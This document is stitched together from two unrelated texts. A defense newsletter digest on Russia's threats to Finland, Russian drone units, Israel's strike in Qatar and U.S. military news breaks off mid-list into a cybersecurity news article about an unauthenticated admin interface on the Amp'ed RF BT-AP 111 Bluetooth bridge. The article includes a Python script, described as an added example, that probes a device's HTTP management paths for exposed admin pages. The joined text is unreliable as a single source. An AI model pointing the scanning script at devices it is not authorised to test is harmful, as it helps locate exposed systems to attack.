    Related: Russian officials “are engaging in a top-down Kremlin-organized effort to threaten Finland,” analysts at the Institute for the Study of War wrote in their Tuesday assessment. Moscow’s threats include the allegation that Finland is becoming a “real hotbed of fascism faster than Ukraine” and that “nothing can be ruled out” in terms of a Russian military intervention into Finland, according to Russian State Duma Defense Committee Chairperson Andrei Kartapolov on Tuesday. And that charge came one day after Dmitry Medvedev of Russia’s Security Council threatened Finland with “language that directly mirrored the Kremlin’s false justifications for its invasions of Ukraine,” ISW writes, warning these threats may be used “to justify future Russian aggression against a NATO member state.” 

    Update: Russia is losing fewer troops as its invasion continues to progress across eastern Ukraine, analysts at the Institute for the Study of War wrote in their Tuesday assessment, citing statistics from Ukrainian officials. From May to August, Russia lost about “68 casualties per square kilometer seized,” compared to “an average of 99 casualties per square kilometer gained in January, February, March, and April 2025,” a half-dozen researchers write in ISW’s latest analysis.  

    Behind the downward trend: Russia has changed how it uses drones in support of combat troops on the ground in an effort “largely led by UAV operators of Russia’s Rubikon Center for Advanced Unmanned Technologies,” ISW writes. That organization was established one year ago, but its operations picked up in early 2025 and have been boosted by the growing use of fiber-optic aerial drones, which cannot be jammed by Ukrainian electronic-warfare systems along the frontlines because they carry no radio control link. Background: “Russia began to proliferate Rubikon UAV units across the frontline in April and May 2025, and ISW has observed reports of Rubikon units operating in Kursk Oblast and throughout eastern Ukraine from northeastern Kharkiv Oblast to the Velykomykhailivka direction in western Donetsk Oblast.” More, here.

    For your ears only: Listen to CNA’s Sam Bendett discuss the Rubikon Center and much more in the latest episode of Defense One Radio: “How drone warfare is changing.” 

    Additional reading: “Tanks Were Just Tanks, Until Drones Made Them Change,” the New York Times reported in a curious interactive on Monday. 


    Welcome to this Wednesday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson with Bradley Peniston. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1939, the British accidentally sank one of their own submarines near Norway, marking the Brits’ first sub loss of the war. Only two of the 55-man crew survived.  

    Israel’s attack in Qatar

    Gulf nations ask: if U.S. protection can’t stop an attack on Qatar, what good is it? That’s the gist of a New York Times article on the reverberations from Tuesday’s air strike that sought to kill Hamas officials in Doha.

    Key quote: “Qatar being unable to protect its own citizens with literally the U.S. Central Command on its territory has prompted locals to question the value of the American partnership,” said Kristin Diwan, a senior resident scholar at the Arab Gulf States Institute in Washington, a research group. “It’s a real problem for Gulf leaders. And it should worry the United States as well.”

    WH spox: Trump “feels very badly” about the attack. The president learned about the attack from the U.S. military, and told envoy Steve Witkoff to tip off the Qatari government, Karoline Leavitt told reporters Tuesday. Eliminating Hamas is a "worthy goal," Leavitt read from a prepared statement. “Unilaterally bombing inside Qatar, a sovereign nation and close ally of the United States that is working very hard and bravely taking risks with us to broker peace, does not advance Israel or America's goals.” More from Axios, here.

    NYT has an explainer on the attack, here.

    Around the Defense Department

    No DOW in NDAA. At least one lawmaker has tried and failed to make the Department of War renaming official, reports Reese Gorman of News of the United States. “An amendment introduced to the NDAA that would rename the Department of Defense to the Department of War—which requires an act of Congress—was not found in order by the Rules Committee.”

    News summaries sent to National Guard leaders reflect public “fear” and troops’ “shame” over D.C. deployment, the Washington Post reports off copies of the summaries slipped to them. “Trending videos show residents reacting with alarm and indignation,” one summary, from Friday, said. “One segment features a local [resident] describing the Guard’s presence as leveraging fear, not security — highlighting widespread discomfort with what many perceive as a show of force.” More, here.

    Trump’s DC “emergency” expires at midnight, but it’s not clear what will change in the nation’s capital. New York Times: “The end of the 30-day period has no bearing on the thousands of National Guard troops, drawn from the District of Columbia itself and from eight Republican-led states, who have been deployed to Washington. Neither does it directly affect the hundreds of additional federal law enforcement officers — from the Federal Bureau of Investigation, the Drug Enforcement Administration and other agencies — who have been sent out into the city to patrol. And U.S. Immigration and Customs Enforcement agents will continue to take people into custody around Washington, as they did long before the emergency was declared.” More, here.

    New: Trump’s Pentagon chief spoke to his Chinese counterpart Tuesday, Pete Hegseth’s spokesman announced Wednesday in what to our knowledge is a first for Hegseth. 

    In his phone call with Defense Minister Adm. Dong Jun, “Hegseth made clear that the United States does not seek conflict with China nor is it pursuing regime change or strangulation of the [People’s Republic of China]. At the same time, however, he forthrightly relayed that the U.S. has vital interests in the Asia-Pacific, the priority theater, and will resolutely protect those interests,” the Defense Department said in a short statement. 

    INDOPACOM: “The homeland is in the Pacific.” In a Monday speech, U.S. Indo-Pacific Command leader Adm. Samuel Paparo said he’s not concerned about reports that defending the homeland is the Pentagon’s new top priority. “The Indo-Pacific is the priority theater of the United States of America.” Defense One’s Jennifer Hlad has a bit more from Honolulu, here.

    China is trying to strongarm Palau with soft power. Beijing is deliberately attempting to “erode leadership, disrupt vital services, and weaken confidence in government” in Palau, and has sent drugs to wash ashore on the Pacific nation to “weaken our community,” the country’s president said Monday. Hlad explains how, here.

    Related: “Leaked files show a Chinese company is exporting the Great Firewall’s censorship technology,” reports Toronto’s Globe and Mail.

    China’s submarine buildup, illustrated by the Wall Street Journal: “China is on the verge of becoming a world-class submarine power, with new technology and a bigger, better fleet that is gaining on the U.S. and its allies—spurring a new undersea arms race in the Pacific.” Find that here.

    To keep up, a U.S. sub yard is turning to AI. “By the end of this year, our plan is to have every single person in our manufacturing shops—17 different businesses, basically across 550 acres—doing work based on the output of what AI tells us to go do. At the end of [2026] all of the people working on all of our ships will be directed by what AI tells us to do,” Brian Fields, the chief technology officer for HII’s Newport News Shipbuilding division, said Tuesday. Defense One’s Lauren C. Williams has a bit more, here.

    Speedboat strike

    The Trump administration has sent a War Powers Resolution report to Congress laying out its justification for the deadly Sept. 2 attack on a speedboat in international waters. Quote: “In the face of the inability or unwillingness of some states in the region to address the continuing threat to United States persons and interests emanating from their territories, we have now reached a critical point where we must meet this threat to our citizens and our most vital national interests with United States military force in self-defense.” Read more, via the War Powers Resolution Reporting Project, here.

    Even with this required notice, the attack was unlawful in several ways, writes Marty Lederman, a professor at the Georgetown University Law Center, in Just Security. “…it’s likely that the President lacked any affirmative domestic authority to order the strike, and the strike itself appears to have violated several legal prohibitions.”

    And the U.S. military broke a bedrock principle. “As I’ll discuss at the end of this piece, regardless of which laws might have been broken, what’s more alarming, and of greater long-term concern, is that U.S. military personnel crossed a fundamental line the Department of Defense has been resolutely committed to upholding for many decades—namely, that (except in rare and extreme circumstances not present here) the military must not use lethal force against civilians, even if they are alleged, or even known, to be violating the law.” Read that, here.

    Related reading: 


  • A critical security vulnerability has been discovered in the Amp’ed RF BT-AP 111 Bluetooth Access Point, exposing organizations to significant security risks through an unauthenticated administrative interface.

    The device, which serves as a Bluetooth-to-Ethernet bridge supporting both access point and gateway functionality, lacks fundamental authentication controls on its web-based management system.

    The vulnerability, designated as CVE-2025-9994, allows remote attackers with network access to gain complete administrative control over the device without requiring any credentials.

    This flaw affects the device’s HTTP-based administrative interface, which manages critical functions including Bluetooth configurations, network parameters, and security settings.

    The BT-AP 111 supports Universal Plug and Play (UPnP) on the Ethernet side and can handle up to seven simultaneous Bluetooth connections through its UART Serial interface.

    The vulnerability was documented by Carnegie Mellon University’s CERT Coordination Center (CERT/CC), whose vulnerability note highlights the device’s failure to implement baseline security controls.

    The note observes that this configuration runs counter to NIST guidance, specifically SP 800-121 Rev. 2 (Guide to Bluetooth Security), which calls for authentication on Bluetooth devices at Service Level 2 or higher.

    Authentication Bypass Mechanism

    The vulnerability stems from a complete absence of authentication in the device’s web interface: there is no login step to bypass, because none was ever built.

    Unlike typical network devices that present a login screen or require certificate-based authentication, the BT-AP 111 serves its administrative panel directly to any client that connects to its HTTP port.

    This design flaw lets an attacker modify device configurations, alter Bluetooth pairing settings, and potentially intercept or manipulate data flowing through the bridge.

    The exploitation vector requires only network connectivity to the target device, so the flaw is reachable by anyone on the same local network and, where the management port is exposed to the internet or another untrusted network, by remote attackers as well.

    Because the vendor has not responded to disclosure efforts and no fixed firmware is available, security professionals recommend isolating affected devices on a segregated network segment that untrusted users cannot reach, and restricting access to the HTTP management port to designated administrative hosts, until proper authentication controls can be implemented.
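    The condition described above, an administrative interface served without any authentication step, is straightforward to verify from the network. The script below is an added example and is not part of the CERT/CC note, the Cyber Security News article, or any vendor tooling. It probes a management interface over plain HTTP and classifies the response as “auth_required” (an HTTP 401/407 challenge), “login_page” (a redirect to a login URL or a form with a password field), or “unauthenticated_admin” (a configuration form served directly). The BT-AP 111’s real admin paths are not given on the page, so the paths probed (`/` and `/index.html`) and the configuration-form markers are assumptions; two stub servers on the loopback interface, one mimicking the vulnerable behaviour and one mimicking a device that challenges for credentials, are constructed so the example runs offline.

```python
"""Probe an HTTP management interface and report whether it demands credentials.

Added example (not from the CERT/CC note or the vendor). Admin paths and the
form markers are assumptions; the stub servers are constructed test fixtures.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumption: paths at which an embedded device is likely to serve its admin panel.
ADMIN_PATHS = ("/", "/index.html")
# Assumption: words that mark a configuration form on a Bluetooth-to-Ethernet bridge.
CONFIG_MARKERS = ("bluetooth", "pin", "ip address", "gateway", "ssid")


def classify_response(status, headers, body):
    """Classify one HTTP response to a GET on a management path."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    if status in (401, 407):
        return "auth_required"          # server issued a credential challenge
    if status in (301, 302, 303, 307, 308):
        location = hdrs.get("location", "").lower()
        return "login_page" if ("login" in location or "auth" in location) else "unknown"
    if status == 200:
        text = body.decode("utf-8", "replace").lower()
        if 'type="password"' in text or "type=password" in text:
            return "login_page"         # a login form, not the admin panel itself
        if "<form" in text and any(m in text for m in CONFIG_MARKERS):
            return "unauthenticated_admin"  # configuration form handed out with no login
    return "unknown"


def probe(host, port, paths=ADMIN_PATHS, timeout=5):
    """GET each candidate path and return {path: classification}."""
    results = {}
    for path in paths:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("GET", path)
            resp = conn.getresponse()
            results[path] = classify_response(resp.status, dict(resp.getheaders()), resp.read())
        finally:
            conn.close()
    return results


def requires_auth(results):
    """True unless any probed path served the admin panel without a login."""
    return not any(v == "unauthenticated_admin" for v in results.values())


# --- constructed stubs standing in for two device behaviours --------------------
VULNERABLE_PAGE = (b"<html><body><h1>BT-AP 111 Configuration</h1>"
                   b'<form method="post" action="/apply">'
                   b'Bluetooth PIN: <input name="pin"><br>'
                   b'IP Address: <input name="ipaddr"><br>'
                   b'<input type="submit" value="Apply"></form></body></html>')


class _QuietHandler(BaseHTTPRequestHandler):
    def log_message(self, *args):  # keep demo output clean
        pass


class VulnerableHandler(_QuietHandler):
    """Serves the configuration form to anyone, as the advisory describes."""
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(VULNERABLE_PAGE)))
        self.end_headers()
        self.wfile.write(VULNERABLE_PAGE)


class HardenedHandler(_QuietHandler):
    """Challenges every request for credentials before revealing anything."""
    def do_GET(self):
        self.send_response(401)
        self.send_header("WWW-Authenticate", 'Basic realm="BT-AP 111"')
        self.send_header("Content-Length", "0")
        self.end_headers()


def run_demo():
    """Start both stubs on loopback, probe each, and return their classifications."""
    out = {}
    for name, handler in (("vulnerable", VulnerableHandler), ("hardened", HardenedHandler)):
        server = HTTPServer(("127.0.0.1", 0), handler)
        threading.Thread(target=server.serve_forever, daemon=True).start()
        try:
            out[name] = probe("127.0.0.1", server.server_address[1])
        finally:
            server.shutdown()
            server.server_close()
    return out


if __name__ == "__main__":
    for name, res in run_demo().items():
        verdict = "requires authentication" if requires_auth(res) else "UNAUTHENTICATED ADMIN INTERFACE"
        print(f"{name}: {verdict} {res}")
```

    To check a real device, call `probe(host, 80)` against the bridge’s management address from a host on the same segment; a result of “unauthenticated_admin” on any path reproduces the condition in the advisory and is a reason to move the device behind a firewall rule that admits only designated management hosts. The heuristics are deliberately conservative: a page that merely mentions Bluetooth without a form, or a redirect to an unrecognised URL, is reported as “unknown” rather than guessed at.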


    The post Amp’ed RF BT-AP 111 Bluetooth Access Point Vulnerability Let Attackers Gain Full Admin Access appeared first on Cyber Security News.
